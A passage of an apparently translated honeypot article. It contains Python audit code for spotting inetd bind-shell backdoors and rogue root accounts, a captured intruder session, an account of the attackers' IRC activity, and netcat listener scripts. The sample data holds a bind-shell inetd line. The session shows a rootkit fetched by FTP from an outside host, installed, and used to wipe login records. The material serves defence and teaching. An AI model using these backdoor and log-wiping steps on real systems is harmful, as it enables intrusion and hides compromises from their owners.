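    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 6:  # blank, comment and too-short lines are skipped
            entries.append(InetdEntry(*fields[:6], fields[6:]))
    return entries


def rogue_inetd_entries(entries: List[InetdEntry]) -> List[InetdEntry]:
    """A service whose server program is a shell is a bind shell: whoever
    connects to the port gets that shell running as `user`."""
    return [e for e in entries if e.server.rsplit("/", 1)[-1] in SHELLS]


def parse_passwd(text: str) -> List[Dict[str, str]]:
    keys = ("name", "pw", "uid", "gid", "gecos", "home", "shell")
    return [dict(zip(keys, f)) for f in (line.split(":") for line in text.splitlines())
            if len(f) == 7]


def extra_uid0_accounts(passwd_text: str) -> List[str]:
    """Any account other than root with UID 0 is root under another name."""
    return [r["name"] for r in parse_passwd(passwd_text)
            if r["uid"].isdigit() and int(r["uid"]) == 0 and r["name"] != "root"]


def passwordless_accounts(shadow_text: str) -> List[str]:
    """Shadow entries whose hash field is empty: login needs no password.
    Locked (*, !, NP) and hashed entries are not reported."""
    names = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] and fields[1] == "":
            names.append(fields[0])
    return names


def daemon_pids(ps_text: str, name: str = "inetd") -> List[int]:
    """PIDs of every `name` process in `ps -u root` output (first line is the
    header).  Two inetds, as in the session further down, means a second copy
    was started with its own configuration file."""
    pids = []
    for line in ps_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4 and fields[0].isdigit() and fields[-1] == name:
            pids.append(int(fields[0]))
    return pids


def audit(inetd_text: str, passwd_text: str, shadow_text: str, ps_text: str) -> Dict[str, list]:
    return {
        "rogue_services": [e.service for e in rogue_inetd_entries(parse_inetd_conf(inetd_text))],
        "extra_uid0": extra_uid0_accounts(passwd_text),
        "passwordless": passwordless_accounts(shadow_text),
        "inetd_pids": daemon_pids(ps_text),
    }


# Constructed samples: the backdoor line from the exploit, the two appended
# accounts, and a process list with the extra inetd.  Hashes are made up.
SAMPLE_INETD = """\
ftp         stream  tcp  nowait  root  /usr/sbin/in.ftpd     in.ftpd
telnet      stream  tcp  nowait  root  /usr/sbin/in.telnetd  in.telnetd
ingreslock  stream  tcp  nowait  root  /bin/sh               sh -i
"""
SAMPLE_PASSWD = """\
root:x:0:1:Super-User:/:/sbin/sh
rsmith:x:1001:10:R Smith:/export/home/rsmith:/bin/ksh
r:x:0:0:User:/:/sbin/sh
re:x:500:1000:daem:/:/sbin/sh
"""
SAMPLE_SHADOW = """\
root:Xq9sT1kLm2pWc:10891::::::
rsmith:NP:6445::::::
r::10891::::::
re::6445::::::
"""
SAMPLE_PS = """\
  PID TTY      TIME CMD
  207 ?        0:00 inetd
  301 ?        0:00 sendmail
11467 ?        0:00 inetd
"""
```

On a live system the inetd text comes from /etc/inetd.conf and from whatever file a second inetd was started with (its -s argument is visible in ps -ef); the backdoor here never touched /etc/inetd.conf at all, which is why the process list matters as much as the configuration file.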
!"'!"P#$#$'linux'
SunOS 5.6
login: re
Choose a new password.
New password: abcdef
Re-enter new password: abcdef
telnet (SYSTEM): passwd successfully changed for re
Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
$ su r
Our guest now has root. His next step is to install his tools and take control of the entire system. First we see him create a hidden directory to keep his tools in.
# mkdir /dev/".."
# cd /dev/".."
With the directory in place, he downloads the tools he needs from another system.
# ftp shell.example.net
Connected to shell.example.net.
220 shell.example.net FTP server (Version 6.00) ready.
Name (shell.example.net:re): j4n3
331 Password required for j4n3.
Password: abcdef
230 User j4n3 logged in.
ftp> get sun2.tar
200 PORT command successful.
150 Opening ASCII mode data connection for 'sun2.tar' (1720320 bytes).
226 Transfer complete.
local: sun2.tar remote: sun2.tar
1727580 bytes received in 2.4e+02 seconds (6.90 Kbytes/s)
ftp> get l0gin
200 PORT command successful.
150 Opening ASCII mode data connection for 'l0gin' (47165 bytes).
226 Transfer complete.
local: l0gin remote: l0gin
47378 bytes received in 7.7 seconds (6.04 Kbytes/s)
ftp> quit
221 Goodbye.
Once the tools were downloaded, the next step was to unpack and install them. Notice that the whole installation is driven by a simple script, setup.sh, which in turn calls a second script, secure.sh.
# tar -xvf sun2.tar
x sun2, 0 bytes, 0 tape blocks
x sun2/me, 859600 bytes, 1679 tape blocks
x sun2/ls, 41708 bytes, 82 tape blocks
x sun2/netstat, 6784 bytes, 14 tape blocks
x sun2/tcpd, 19248 bytes, 38 tape blocks
x sun2/setup.sh, 1962 bytes, 4 tape blocks
x sun2/ps, 35708 bytes, 70 tape blocks
x sun2/packet, 0 bytes, 0 tape blocks
x sun2/packet/sunst, 9760 bytes, 20 tape blocks
x sun2/packet/bc, 9782 bytes, 20 tape blocks
x sun2/packet/sm, 32664 bytes, 64 tape blocks
x sun2/packet/newbc.txt, 762 bytes, 2 tape blocks
x sun2/packet/syn, 10488 bytes, 21 tape blocks
x sun2/packet/s1, 12708 bytes, 25 tape blocks
x sun2/packet/sls, 19996 bytes, 40 tape blocks
x sun2/packet/smaq, 10208 bytes, 20 tape blocks
x sun2/packet/udp.s, 10720 bytes, 21 tape blocks
x sun2/packet/bfile, 2875 bytes, 6 tape blocks
x sun2/packet/bfile2, 3036 bytes, 6 tape blocks
x sun2/packet/bfile3, 20118 bytes, 40 tape blocks
x sun2/packet/sunsmurf, 11520 bytes, 23 tape blocks
x sun2/sys222, 34572 bytes, 68 tape blocks
x sun2/m, 9288 bytes, 19 tape blocks
x sun2/l0gin, 47165 bytes, 93 tape blocks
x sun2/sec, 1139 bytes, 3 tape blocks
x sun2/pico, 222608 bytes, 435 tape blocks
x sun2/sl4, 28008 bytes, 55 tape blocks
x sun2/fix, 10360 bytes, 21 tape blocks
x sun2/bot2, 508 bytes, 1 tape blocks
x sun2/sys222.conf, 42 bytes, 1 tape blocks
x sun2/le, 21184 bytes, 42 tape blocks
x sun2/find, 6792 bytes, 14 tape blocks
x sun2/bd2, 9608 bytes, 19 tape blocks
x sun2/snif, 16412 bytes, 33 tape blocks
x sun2/secure.sh, 1555 bytes, 4 tape blocks
x sun2/log, 47165 bytes, 93 tape blocks
x sun2/check, 46444 bytes, 91 tape blocks
x sun2/zap3, 13496 bytes, 27 tape blocks
x sun2/idrun, 188 bytes, 1 tape blocks
x sun2/idsol, 15180 bytes, 30 tape blocks
x sun2/sniff-10mb, 16488 bytes, 33 tape blocks
x sun2/sniff-100mb, 16496 bytes, 33 tape blocks
# rm sun2.tar
# mv l0gin sun2
# cd sun2
# ./setup.sh
HAX0R W1TH K1DD13
Ok this thing is intrumpte :-)
The first thing the toolkit does is wipe the log entries that record his activity.
- wtmp:
/var/adm/wtmp is Sun Jun  4 11:47:39 2000
/usr/adm/wtmp is Sun Jun  4 11:47:39 2000
/etc/wtmp is Sun Jun  4 11:47:39 2000
/var/log/wtmp cannot open
WTMP = /var/adm/wtmp
Removing user re at pos: 1440
Done!
- utmp:
/var/adm/utmp is Sun Jun  4 11:47:39 2000
/usr/adm/utmp is Sun Jun  4 11:47:39 2000
/etc/utmp is Sun Jun  4 11:47:39 2000
/var/log/utmp cannot open
/var/run/utmp cannot open
UTMP = /var/adm/utmp
Removing user re at pos: 288
Done!
- lastlog:
/var/adm/lastlog is Sun Jun  4 11:47:39 2000
/usr/adm/lastlog is Sun Jun  4 11:47:39 2000
/etc/lastlog cannot open
/var/log/lastlog cannot open
LASTLOG = /var/adm/lastlog
User re has no wtmp record. Zeroing lastlog..
- wtmpx:
/var/adm/wtmpx is Sun Jun  4 11:47:39 2000
/usr/adm/wtmpx is Sun Jun  4 11:47:39 2000
/etc/wtmpx is Sun Jun  4 11:47:39 2000
/var/log/wtmpx cannot open
WTMPX = /var/adm/wtmpx
Done!
- utmpx:
/var/adm/utmpx is Sun Jun  4 11:47:39 2000
/usr/adm/utmpx is Sun Jun  4 11:47:39 2000
/etc/utmpx is Sun Jun  4 11:47:39 2000
/var/log/utmpx cannot open
/var/run/utmpx cannot open
UTMPX = /var/adm/utmpx
Done!
./setup.sh: ./zap: not found
After cleaning the logs they "secure" the system. They got in easily, so others could too, and they do not want the fruits of their labour taken by someone else.
./secure.sh: rpc.ttdb=: not found
#: securing.
changing modes on local files.
#: will add more local security later.
#: 2) remote crap like rpc.status, nlockmgr etc..
./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
#: 3) killed statd, rpcbind, nlockmgr
#: 4) removing them so they ever start again!
5) secured.
  207 ?        0:00 inetd
11467 ?        0:00 inetd
cp: cannot access /dev/../sun/bot2
kill these processes @!#!@#!
cp: cannot access lpq
./setup.sh: /dev/ttyt/idrun: cannot execute
Next the IRC proxy is started. Right after that he kills the second inetd and runs the hardening script again, apparently confused.
IRC proxy v2.6.4 GNU project (c) 1998-99
coded by James Seter
:bugs-> (pharos@refract.com) or IRC pharos on EFnet
--Using conf file ./sys222.conf
--Configuration:
   Daemon port......: 9879
   Maxusers.........:
   Default conn port: 6667
   Pid file.........: ./pid.sys222
   Vhost default....: -System default-
   Process ID.......: 11599
Exit ./sys222{7}: Success went into the background.
Many files are then replaced, among them /bin/login, /bin/ls, /usr/sbin/netstat and /bin/ps. We strongly recommend reading the source of setup.sh and secure.sh to see exactly what the two scripts do, because that is what has to be undone when recovering a system hit by a similar kit.
# kill -9 11467
# ps -u root | grep inetd
  207 ?        0:00 inetd
# ./secure.sh
./secure.sh: rpc.ttdb=: not found
#: securing.
changing modes on local files.
#: will add more local security later.
#: 2) remote crap like rpc.status, nlockmgr etc..
./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
./secure.sh: usage: kill [ [ -sig ] id ... | -l ]
#: 3) killed statd, rpcbind, nlockmgr
#: 4) removing them so they ever start again!
5) secured.
# ps -u | grep ttdb
ps: option requires an argument -- u
usage: ps [ -aAdeflcj ] [ -o format ] [ -t termlist ]
        [ -u userlist ] [ -U userlist ] [ -G grouplist ]
        [ -p proclist ] [ -g pgrplist ] [ -s sidlist ]
  'format' is one or more of:
        user ruser group rgroup uid ruid gid rgid pid ppid pgid sid
        pri opri pcpu pmem vsz rss osz nice class time etime stime
        f s c tty addr wchan fname comm args
# ps -adj | grep ttdb
Finally, our guests ran an IRC bot to keep control of their IRC channels; this bot also recorded their sessions.
# ./me -f bot2
init: using config file: bot2
EnergyMech 2.7.1, December 2nd, 1999
Starglider Class EnergyMech
Compiled on Jan 27 2000 07:06:04
Features: DYN, NEW, SEF
init: unknown configuration item: "noseen" (ignored)
init: mechs added [save2]
init: warning: save2 has no userlist, running in setup mode
init: EnergyMech running...
# exit;
$ exit
Once this bot was ready they left the system; from then on the bot captured all of their conversations. If you want to know more about IRC, see David Brumley's article "Tracking Hackers on IRC". Within a week they came back several times to check that the system was still under their control. After a week they returned and attempted to use its resources for denial-of-service attacks. Naturally they did not succeed: our "Honeypot" had anticipated this from the start of its design, every attempt to use our system was blocked, and the denial-of-service attacks they launched were blocked automatically.
Next, we analyze the behavior and psychology of the hackers mainly through their IRC conversations. With this understanding we can defend against them better.
The following is a day-by-day account of the next two weeks. We will call this IRC channel K1DD13 and two of its members D1CK and J4N3; much information, such as IP addresses, has been changed here. We can see that they do not even understand the basics of UNIX, yet they can still damage a lot of systems.
Day 1, June 4
The conversation mainly concerns building a vulnerability database, so that they can attack potential targets by sharing resources.
Day 2, June 5
Today D1CK and J4N3 share vulnerabilities. Of particular note is how many networks they have already attacked; they appear to be attacking a university. They also discuss new tools for Linux and SPARC.
Day 3, June 6
D1CK and J4N3 boast about how many systems they have hit with denial-of-service attacks. Then D1CK shows J4N3 how to mount a partition, they discuss how to use Sniffit, and finally D1CK seems to be searching for IRIX vulnerabilities and attack tools.
Day 4, June 7
D1CK and J4N3 pick a system in India for a denial-of-service attack, and at the end they also turn on other IRC users.
Day 5, June 8
D1CK asks J4N3 to take over three systems. D1CK and his brother SP07 try to work out how a sniffer works, asking questions like "does the sniffer have to be on the same network?"
Day 6, June 9
Our friends seem very busy; D1CK appears to have broken into 40 systems.
Day 7, June 10
D1CK teaches a newcomer to K1DD13 how to use the sadmind vulnerability; we are not sure that D1CK himself understands how it works.
Day 8, June 11
D1CK and J4N3 discuss the systems they own and the people they want to hit with denial of service; D1CK discovers the Ping of Death.
Day 9, June 12
D1CK seems to have hit the jackpot: he found an ISP and obtained access to its billing system and 5000 accounts.
Day 10, June 13
SP07 joins.
Day 11, June 14
They start cracking user passwords and accessing personal accounts.
Day 12, June 15
D1CK and J4N3 try to obtain credit card numbers in a credit-card channel; if they succeed, they can buy some domain names.
Day 13, June 16
D1CK and J4N3 are still in the credit-card channel. At the end of the chat they turn their attention back to their own web site.
Day 14, June 17
D1CK and J4N3 talk about credit cards and continue building their own web site. This is what we learned about this hacker group in 14 days. Of course not all such groups are like this; in fact we observed only a small part of them. But we hope this information gives you some useful hints: many of them do not have the high technical skill we imagine, and many do not even understand the tools they are using, yet once they take an interest in a system they can get more than we would expect. This is no drama: they do not care about the damage they cause, only about their attacks.
This section is based on the results of the Honeypot project, a project initiated by a number of security experts to learn the tools and tactics of the hacker community.
3. A simple "Honeypot" implementation
Having read the case above, wouldn't you like to try building a "Honeypot" to monitor your own network or system? So how do we implement one? Netcat, the universal Swiss army knife and ancestor of hacker tools, makes it easy. God bless me! Thanks to Weld and the L0pht members for providing such an excellent "Honeypot" :), usable on multiple platforms. Download:
http://www.l0pht.com/~weld/netcat.
Under normal circumstances, many hackers like to run slow scans of the target's services to decide on the next possible attack direction. One of Netcat's features is that it can listen on ports for us, which lets us build fake services on our Linux, NT or FreeBSD hosts: sendmail, DNS, telnet, FTP or even a web server, so that port scans and connection information can be audited. Of course there are problems, for example "nmap -sS victim" (a half-open scan), but in fact many hackers, once they find a port open, want to determine the service information such as its version, so they choose to complete the three-way handshake, and then their IP ........
The script listed below is a "Honeypot" on a Solaris workstation. First you need to start each listener; the Netcat options used are:
-l ordinary listen mode
-p the port you choose
-vv very verbose mode
xxx.xxx.xxx.xxx the IP address the system uses
The script uses ordinary listen mode (-l) rather than the persistent listen mode (-L), because we want to add a comment to the audit record after every connection attempt; here the loop does that by appending the audit information to a second file. One thing to emphasize is to specify the local IP address, so that the port is bound only to that address; otherwise the port can be reached through any other address the system has. To make auditing easier, each record is appended to another file and the original record file is cleared.
Below is the content of the "port25" script:
while true; do
# nc prints connection details on stderr, so stderr goes to the audit file
/usr/bin/nc -l -p 25 -vv xxx.xxx.xxx.xxx 2>> /var/audit/nc-port25
date >> /var/audit/nc-port25
echo "******************* Failed sendmail attempt - Port 25 ********************\n" >> /var/audit/nc-port25
# move this attempt into the combined log and start with an empty record file
cat /var/audit/nc-port25 >> /var/audit/nc-log
cp /dev/null /var/audit/nc-port25
done
The "2" before ">>" on the nc command line redirects the error output channel, where Netcat writes its connection information, into the audit file.
Similarly, we can generate scripts for the other ports and then run them:
/var/audit/nc-wrappers/port25 &
/var/audit/nc-wrappers/port79 &
/var/audit/nc-wrappers/port512 &
/var/audit/nc-wrappers/port513 &
/var/audit/nc-wrappers/port514 &
....
....
....
Finally, we can put a script in the "/etc/rc2.d" directory so that the system starts our "Honeypot" automatically.
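As an added illustration (not part of the original article, nor Netcat's own code), the following Python script does what the port25 wrapper does without Netcat: it binds a listener to one local address, accepts a connection, records the time, the peer's address and the first bytes sent, and appends a marked record to an audit file. The address 127.0.0.1, port 0 and the file name nc-log are assumptions for a local self-test; on a real honeypot you would bind the system's own address and port 25.

```python
import socket
import threading
from datetime import datetime, timezone

def open_listener(bind_ip, port):
    """Bind only to the chosen local address (the page's xxx.xxx.xxx.xxx), like nc -l -p PORT."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_ip, port))
    srv.listen(5)
    return srv

def accept_and_log(srv, log_path, service="sendmail"):
    """Accept one connection, record who came and what they sent, then close.
    Returns the audit record that was appended to log_path."""
    conn, peer = srv.accept()
    port = srv.getsockname()[1]
    with conn:
        conn.settimeout(2.0)
        try:
            first = conn.recv(256)          # whatever the scanner sends first, if anything
        except socket.timeout:
            first = b""
    stamp = datetime.now(timezone.utc).strftime("%a %b %d %H:%M:%S UTC %Y")
    record = (f"connect to port {port} from {peer[0]} port {peer[1]}\n"
              f"first bytes: {first!r}\n{stamp}\n"
              f"******************* Failed {service} attempt - Port {port} ********************\n")
    with open(log_path, "a") as fh:         # the combined nc-log of the page's script
        fh.write(record)
    return record

def probe_locally(payload=b"HELO evil.example\r\n", log_path="nc-log"):
    """Self-check: run one listener on 127.0.0.1 and play the scanner's side ourselves.
    Assumed demo values: loopback address and an OS-chosen port (port 0)."""
    srv = open_listener("127.0.0.1", 0)
    port = srv.getsockname()[1]
    out = {}
    t = threading.Thread(target=lambda: out.update(record=accept_and_log(srv, log_path)))
    t.start()
    with socket.create_connection(("127.0.0.1", port)) as c:
        c.sendall(payload)                  # constructed sample of what a probe might send
    t.join(10)
    srv.close()
    return out.get("record", ""), port

if __name__ == "__main__":
    rec, _ = probe_locally()
    print(rec)
```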
NMAP scan results:
FTP -------------- 21
Telnet ------------ 23
Sendmail -------- 25
TFTP ------------- 69
Finger ------------ 79
Web -------------- 80, 443, 8080
NetBIOS --------- 139
REXEC ------------- 512
Rlogin ------------- 513
RSH ----------------- 514
Netbus ------------- 12345
BO ------------------ 31337
4. Explanation of tools
4.1 Winetd
Winetd is a very simple "Honeypot" implementation. Installation is very easy and the interface is friendly, but the disguise is too simple to really fool a hacker; judged by its functions it is not a strict "Honeypot".
By default our system has very few services open; below is the nmap result before starting Winetd:
Port      State   Service
135/tcp   open    loc-srv
445/tcp   open    microsoft-ds
3389/tcp  open    msrdp
We can see that the system only opens three ports.
After Winetd is started, it opens services such as echo, telnet and SMTP on our system. The nmap scan result:
Port      State   Service
3/tcp     open    compressnet
7/tcp     open    echo
13/tcp    open    daytime
23/tcp    open    telnet
25/tcp    open    smtp
34/tcp    open    unknown
135/tcp   open    loc-srv
137/tcp   open    netbios-ns
139/tcp   open    netbios-ssn
445/tcp   open    microsoft-ds
3389/tcp  open    msrdp
When we telnet to port 23, the following is displayed:
Red Hat Linux release 7.0 (Guinness) Kernel 2.2.16-22 on an i686
login:
In fact our system is W2K. The flexibility of Winetd is that you can define which services to open and which program is used to simulate each one. It also logs and can counterattack.
When someone scans or otherwise probes a system running Winetd, the probe is detected, as the log entries left behind by our nmap scan show.
Note, however, that an experienced hacker will not be fooled by such a "Honeypot": he first uses fingerprinting to determine whether the system is Linux or W2K, and if it turns out to be W2K while telnet shows the banner above, he will leave quickly and may even attack our system out of anger.
Winetd is free software and its idea is very good, but to become a real "Honeypot" it still needs further development.
4.2 DTK
DTK (Deception Tool Kit) runs on a variety of UNIX systems and was developed by Fred Cohen.
DTK can simulate about ten kinds of systems and a great many services; more precisely, it is a state machine, and a very powerful one. It requires a C compiler and Perl to build and run. The disadvantage is that building it is troublesome: for example, at compile time you must choose your own operating system as well as the operating system you want to imitate. Download:
http://all.net/dtk/